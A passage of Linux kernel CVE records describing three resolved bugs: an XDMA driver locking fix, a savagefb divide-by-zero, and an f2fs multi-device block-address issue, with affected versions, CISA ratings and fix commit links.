    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39482",
    "datePublished": "2024-07-05T06:55:10.599Z",
    "dateReserved": "2024-06-25T14:23:23.746Z",
    "dateUpdated": "2025-07-11T17:19:50.338Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40986 (GCVE-0-2024-40986)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:37 – Updated: 2025-05-04 12:57

Title

dmaengine: xilinx: xdma: Fix data synchronisation in xdma_channel_isr()

Summary

In the Linux kernel, the following vulnerability has been resolved: dmaengine: xilinx: xdma: Fix data synchronisation in xdma_channel_isr() Requests the vchan lock before using xdma->stop_request.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8e1f54e4a3f3207c9…
	https://git.kernel.org/stable/c/462237d2d93fc9e92…

Impacted products

Vendor

Product

Version

Linux

Affected: 6a40fb8245965b481b4dcce011cd63f20bf91ee0 , < 8e1f54e4a3f3207c9dc68bb5000603b75802e7f0 (git)
Affected: 6a40fb8245965b481b4dcce011cd63f20bf91ee0 , < 462237d2d93fc9e9221d1cf9f773954d27da83c0 (git)
Affected: 582ce5d734190d74e5ce9cd711cf6e964e1e7b29 (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:55.848Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8e1f54e4a3f3207c9dc68bb5000603b75802e7f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/462237d2d93fc9e9221d1cf9f773954d27da83c0"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40986",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:02:03.948638Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:20.818Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/xilinx/xdma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8e1f54e4a3f3207c9dc68bb5000603b75802e7f0",
              "status": "affected",
              "version": "6a40fb8245965b481b4dcce011cd63f20bf91ee0",
              "versionType": "git"
            },
            {
              "lessThan": "462237d2d93fc9e9221d1cf9f773954d27da83c0",
              "status": "affected",
              "version": "6a40fb8245965b481b4dcce011cd63f20bf91ee0",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "582ce5d734190d74e5ce9cd711cf6e964e1e7b29",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/xilinx/xdma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: xilinx: xdma: Fix data synchronisation in xdma_channel_isr()\n\nRequests the vchan lock before using xdma-\u003estop_request."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:21.310Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8e1f54e4a3f3207c9dc68bb5000603b75802e7f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/462237d2d93fc9e9221d1cf9f773954d27da83c0"
        }
      ],
      "title": "dmaengine: xilinx: xdma: Fix data synchronisation in xdma_channel_isr()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40986",
    "datePublished": "2024-07-12T12:37:31.800Z",
    "dateReserved": "2024-07-12T12:17:45.605Z",
    "dateUpdated": "2025-05-04T12:57:21.310Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-39475 (GCVE-0-2024-39475)

Vulnerability from cvelistv5 – Published: 2024-07-05 06:55 – Updated: 2025-05-04 12:57

Title

fbdev: savage: Handle err return when savagefb_check_var failed

Summary

In the Linux kernel, the following vulnerability has been resolved: fbdev: savage: Handle err return when savagefb_check_var failed The commit 04e5eac8f3ab("fbdev: savage: Error out if pixclock equals zero") checks the value of pixclock to avoid divide-by-zero error. However the function savagefb_probe doesn't handle the error return of savagefb_check_var. When pixclock is 0, it will cause divide-by-zero error.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/be754cbd77eaf2932…
	https://git.kernel.org/stable/c/86435f39c18967cdd…
	https://git.kernel.org/stable/c/32f92b0078ebf79db…
	https://git.kernel.org/stable/c/4b2c67e30b4e1d2ae…
	https://git.kernel.org/stable/c/edaa57480b876e820…
	https://git.kernel.org/stable/c/b8385ff814ca4cb7e…
	https://git.kernel.org/stable/c/5f446859bfa46df0f…
	https://git.kernel.org/stable/c/6ad959b6703e2c4c5…

Impacted products

Vendor

Product

Version

Linux

Affected: 224453de8505aede1890f007be973925a3edf6a1 , < be754cbd77eaf2932408a4e18532e4945274a5c7 (git)
Affected: 84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff , < 86435f39c18967cdd937d7a49ba539cdea7fb547 (git)
Affected: 512ee6d6041e007ef5bf200c6e388e172a2c5b24 , < 32f92b0078ebf79dbe4827288e0acb50d89d3d5b (git)
Affected: 8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1 , < 4b2c67e30b4e1d2ae19dba8b8e8f3b5fd3cf8089 (git)
Affected: 070398d32c5f3ab0e890374904ad94551c76aec4 , < edaa57480b876e8203b51df7c3d14a51ea6b09e3 (git)
Affected: bc3c2e58d73b28b9a8789fca84778ee165a72d13 , < b8385ff814ca4cb7e63789841e6ec2a14c73e1e8 (git)
Affected: 04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288 , < 5f446859bfa46df0ffb34149499f48a2c2d8cd95 (git)
Affected: 04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288 , < 6ad959b6703e2c4c5d7af03b4cfd5ff608036339 (git)
Affected: a9ca4e80d23474f90841251f4ac0d941fa337a01 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.94 , ≤ 6.1.* (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.953Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be754cbd77eaf2932408a4e18532e4945274a5c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/86435f39c18967cdd937d7a49ba539cdea7fb547"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/32f92b0078ebf79dbe4827288e0acb50d89d3d5b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b2c67e30b4e1d2ae19dba8b8e8f3b5fd3cf8089"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edaa57480b876e8203b51df7c3d14a51ea6b09e3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b8385ff814ca4cb7e63789841e6ec2a14c73e1e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f446859bfa46df0ffb34149499f48a2c2d8cd95"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6ad959b6703e2c4c5d7af03b4cfd5ff608036339"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39475",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:41.967965Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:41.294Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/savage/savagefb_driver.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "be754cbd77eaf2932408a4e18532e4945274a5c7",
              "status": "affected",
              "version": "224453de8505aede1890f007be973925a3edf6a1",
              "versionType": "git"
            },
            {
              "lessThan": "86435f39c18967cdd937d7a49ba539cdea7fb547",
              "status": "affected",
              "version": "84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff",
              "versionType": "git"
            },
            {
              "lessThan": "32f92b0078ebf79dbe4827288e0acb50d89d3d5b",
              "status": "affected",
              "version": "512ee6d6041e007ef5bf200c6e388e172a2c5b24",
              "versionType": "git"
            },
            {
              "lessThan": "4b2c67e30b4e1d2ae19dba8b8e8f3b5fd3cf8089",
              "status": "affected",
              "version": "8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1",
              "versionType": "git"
            },
            {
              "lessThan": "edaa57480b876e8203b51df7c3d14a51ea6b09e3",
              "status": "affected",
              "version": "070398d32c5f3ab0e890374904ad94551c76aec4",
              "versionType": "git"
            },
            {
              "lessThan": "b8385ff814ca4cb7e63789841e6ec2a14c73e1e8",
              "status": "affected",
              "version": "bc3c2e58d73b28b9a8789fca84778ee165a72d13",
              "versionType": "git"
            },
            {
              "lessThan": "5f446859bfa46df0ffb34149499f48a2c2d8cd95",
              "status": "affected",
              "version": "04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288",
              "versionType": "git"
            },
            {
              "lessThan": "6ad959b6703e2c4c5d7af03b4cfd5ff608036339",
              "status": "affected",
              "version": "04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a9ca4e80d23474f90841251f4ac0d941fa337a01",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/savage/savagefb_driver.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.94",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "4.19.308",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "5.4.270",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.10.211",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.15.150",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.94",
                  "versionStartIncluding": "6.1.80",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "6.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: savage: Handle err return when savagefb_check_var failed\n\nThe commit 04e5eac8f3ab(\"fbdev: savage: Error out if pixclock equals zero\")\nchecks the value of pixclock to avoid divide-by-zero error. However\nthe function savagefb_probe doesn\u0027t handle the error return of\nsavagefb_check_var. When pixclock is 0, it will cause divide-by-zero error."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:02.110Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/be754cbd77eaf2932408a4e18532e4945274a5c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/86435f39c18967cdd937d7a49ba539cdea7fb547"
        },
        {
          "url": "https://git.kernel.org/stable/c/32f92b0078ebf79dbe4827288e0acb50d89d3d5b"
        },
        {
          "url": "https://git.kernel.org/stable/c/4b2c67e30b4e1d2ae19dba8b8e8f3b5fd3cf8089"
        },
        {
          "url": "https://git.kernel.org/stable/c/edaa57480b876e8203b51df7c3d14a51ea6b09e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/b8385ff814ca4cb7e63789841e6ec2a14c73e1e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f446859bfa46df0ffb34149499f48a2c2d8cd95"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ad959b6703e2c4c5d7af03b4cfd5ff608036339"
        }
      ],
      "title": "fbdev: savage: Handle err return when savagefb_check_var failed",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39475",
    "datePublished": "2024-07-05T06:55:05.886Z",
    "dateReserved": "2024-06-25T14:23:23.745Z",
    "dateUpdated": "2025-05-04T12:57:02.110Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38636 (GCVE-0-2024-38636)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-05-04 09:15

Title

f2fs: multidev: fix to recognize valid zero block address

Summary

In the Linux kernel, the following vulnerability has been resolved: f2fs: multidev: fix to recognize valid zero block address As reported by Yi Zhang in mailing list [1], kernel warning was catched during zbd/010 test as below: ./check zbd/010 zbd/010 (test gap zone support with F2FS) [failed] runtime ... 3.752s something found in dmesg: [ 4378.146781] run blktests zbd/010 at 2024-02-18 11:31:13 [ 4378.192349] null_blk: module loaded [ 4378.209860] null_blk: disk nullb0 created [ 4378.413285] scsi_debug:sdebug_driver_probe: scsi_debug: trim poll_queues to 0. poll_q/nr_hw = (0/1) [ 4378.422334] scsi host15: scsi_debug: version 0191 [20210520] dev_size_mb=1024, opts=0x0, submit_queues=1, statistics=0 [ 4378.434922] scsi 15:0:0:0: Direct-Access-ZBC Linux scsi_debug 0191 PQ: 0 ANSI: 7 [ 4378.443343] scsi 15:0:0:0: Power-on or device reset occurred [ 4378.449371] sd 15:0:0:0: Attached scsi generic sg5 type 20 [ 4378.449418] sd 15:0:0:0: [sdf] Host-managed zoned block device ... (See '/mnt/tests/gitlab.com/api/v4/projects/19168116/repository/archive.zip/storage/blktests/blk/blktests/results/nodev/zbd/010.dmesg' WARNING: CPU: 22 PID: 44011 at fs/iomap/iter.c:51 CPU: 22 PID: 44011 Comm: fio Not tainted 6.8.0-rc3+ #1 RIP: 0010:iomap_iter+0x32b/0x350 Call Trace: <TASK> __iomap_dio_rw+0x1df/0x830 f2fs_file_read_iter+0x156/0x3d0 [f2fs] aio_read+0x138/0x210 io_submit_one+0x188/0x8c0 __x64_sys_io_submit+0x8c/0x1a0 do_syscall_64+0x86/0x170 entry_SYSCALL_64_after_hwframe+0x6e/0x76 Shinichiro Kawasaki helps to analyse this issue and proposes a potential fixing patch in [2]. Quoted from reply of Shinichiro Kawasaki: "I confirmed that the trigger commit is dbf8e63f48af as Yi reported. I took a look in the commit, but it looks fine to me. So I thought the cause is not in the commit diff. I found the WARN is printed when the f2fs is set up with multiple devices, and read requests are mapped to the very first block of the second device in the direct read path. In this case, f2fs_map_blocks() and f2fs_map_blocks_cached() modify map->m_pblk as the physical block address from each block device. It becomes zero when it is mapped to the first block of the device. However, f2fs_iomap_begin() assumes that map->m_pblk is the physical block address of the whole f2fs, across the all block devices. It compares map->m_pblk against NULL_ADDR == 0, then go into the unexpected branch and sets the invalid iomap->length. The WARN catches the invalid iomap->length. This WARN is printed even for non-zoned block devices, by following steps. - Create two (non-zoned) null_blk devices memory backed with 128MB size each: nullb0 and nullb1. # mkfs.f2fs /dev/nullb0 -c /dev/nullb1 # mount -t f2fs /dev/nullb0 "${mount_dir}" # dd if=/dev/zero of="${mount_dir}/test.dat" bs=1M count=192 # dd if="${mount_dir}/test.dat" of=/dev/null bs=1M count=192 iflag=direct ..." So, the root cause of this issue is: when multi-devices feature is on, f2fs_map_blocks() may return zero blkaddr in non-primary device, which is a verified valid block address, however, f2fs_iomap_begin() treats it as an invalid block address, and then it triggers the warning in iomap framework code. Finally, as discussed, we decide to use a more simple and direct way that checking (map.m_flags & F2FS_MAP_MAPPED) condition instead of (map.m_pblk != NULL_ADDR) to fix this issue. Thanks a lot for the effort of Yi Zhang and Shinichiro Kawasaki on this issue. [1] https://lore.kernel.org/linux-f2fs-devel/CAHj4cs-kfojYC9i0G73PRkYzcxCTex=-vugRFeP40g_URGvnfQ@mail.gmail.com/ [2] https://lore.kernel.org/linux-f2fs-devel/gngdj77k4picagsfdtiaa7gpgnup6fsgwzsltx6milmhegmjff@iax2n4wvrqye/

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1a9225fdd0ec95fcf…
	https://git.kernel.org/stable/c/2b2611a42462c6c68…
	https://git.kernel.org/stable/c/e8b485e39b4d17afa…
	https://git.kernel.org/stable/c/33e62cd7b4c281cd7…

Impacted products

Vendor

Product

Version

Linux

Affected: 1517c1a7a4456f080fabc4ac9853930e4b880d14 , < 1a9225fdd0ec95fcf32936bcea9ceef0cf1512dc (git)
Affected: 1517c1a7a4456f080fabc4ac9853930e4b880d14 , < 2b2611a42462c6c685d40b5f3aedcd8d21c27065 (git)
Affected: 1517c1a7a4456f080fabc4ac9853930e4b880d14 , < e8b485e39b4d17afa9a2821fc778d5a67abfc03a (git)
Affected: 1517c1a7a4456f080fabc4ac9853930e4b880d14 , < 33e62cd7b4c281cd737c62e5d8c4f0e602a8c5c5 (git)

Linux

Affected: 5.17
Unaffected: 0 , < 5.17 (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38636",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:27:13.428552Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:27:24.159Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.978Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1a9225fdd0ec95fcf32936bcea9ceef0cf1512dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b2611a42462c6c685d40b5f3aedcd8d21c27065"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e8b485e39b4d17afa9a2821fc778d5a67abfc03a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/33e62cd7b4c281cd737c62e5d8c4f0e602a8c5c5"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/f2fs/data.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1a9225fdd0ec95fcf32936bcea9ceef0cf1512dc",
              "status": "affected",
              "version": "1517c1a7a4456f080fabc4ac9853930e4b880d14",
              "versionType": "git"
            },
            {
              "lessThan": "2b2611a42462c6c685d40b5f3aedcd8d21c27065",
              "status": "affected",
              "version": "1517c1a7a4456f080fabc4ac9853930e4b880d14",
              "versionType": "git"
            },
            {
              "lessThan": "e8b485e39b4d17afa9a2821fc778d5a67abfc03a",
              "status": "affected",
              "version": "1517c1a7a4456f080fabc4ac9853930e4b880d14",
              "versionType": "git"
            },
            {
              "lessThan": "33e62cd7b4c281cd737c62e5d8c4f0e602a8c5c5",
              "status": "affected",
              "version": "1517c1a7a4456f080fabc4ac9853930e4b880d14",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/f2fs/data.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.17"
            },
            {
              "lessThan": "5.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: multidev: fix to recognize valid zero block address\n\nAs reported by Yi Zhang in mailing list [1], kernel warning was catched\nduring zbd/010 test as below:\n\n./check zbd/010\nzbd/010 (test gap zone support with F2FS)                    [failed]\n    runtime    ...  3.752s\n    something found in dmesg:\n    [ 4378.146781] run blktests zbd/010 at 2024-02-18 11:31:13\n    [ 4378.192349] null_blk: module loaded\n    [ 4378.209860] null_blk: disk nullb0 created\n    [ 4378.413285] scsi_debug:sdebug_driver_probe: scsi_debug: trim\npoll_queues to 0. poll_q/nr_hw = (0/1)\n    [ 4378.422334] scsi host15: scsi_debug: version 0191 [20210520]\n                     dev_size_mb=1024, opts=0x0, submit_queues=1, statistics=0\n    [ 4378.434922] scsi 15:0:0:0: Direct-Access-ZBC Linux\nscsi_debug       0191 PQ: 0 ANSI: 7\n    [ 4378.443343] scsi 15:0:0:0: Power-on or device reset occurred\n    [ 4378.449371] sd 15:0:0:0: Attached scsi generic sg5 type 20\n    [ 4378.449418] sd 15:0:0:0: [sdf] Host-managed zoned block device\n    ...\n    (See \u0027/mnt/tests/gitlab.com/api/v4/projects/19168116/repository/archive.zip/storage/blktests/blk/blktests/results/nodev/zbd/010.dmesg\u0027\n\nWARNING: CPU: 22 PID: 44011 at fs/iomap/iter.c:51\nCPU: 22 PID: 44011 Comm: fio Not tainted 6.8.0-rc3+ #1\nRIP: 0010:iomap_iter+0x32b/0x350\nCall Trace:\n \u003cTASK\u003e\n __iomap_dio_rw+0x1df/0x830\n f2fs_file_read_iter+0x156/0x3d0 [f2fs]\n aio_read+0x138/0x210\n io_submit_one+0x188/0x8c0\n __x64_sys_io_submit+0x8c/0x1a0\n do_syscall_64+0x86/0x170\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\nShinichiro Kawasaki helps to analyse this issue and proposes a potential\nfixing patch in [2].\n\nQuoted from reply of Shinichiro Kawasaki:\n\n\"I confirmed that the trigger commit is dbf8e63f48af as Yi reported. I took a\nlook in the commit, but it looks fine to me. So I thought the cause is not\nin the commit diff.\n\nI found the WARN is printed when the f2fs is set up with multiple devices,\nand read requests are mapped to the very first block of the second device in the\ndirect read path. In this 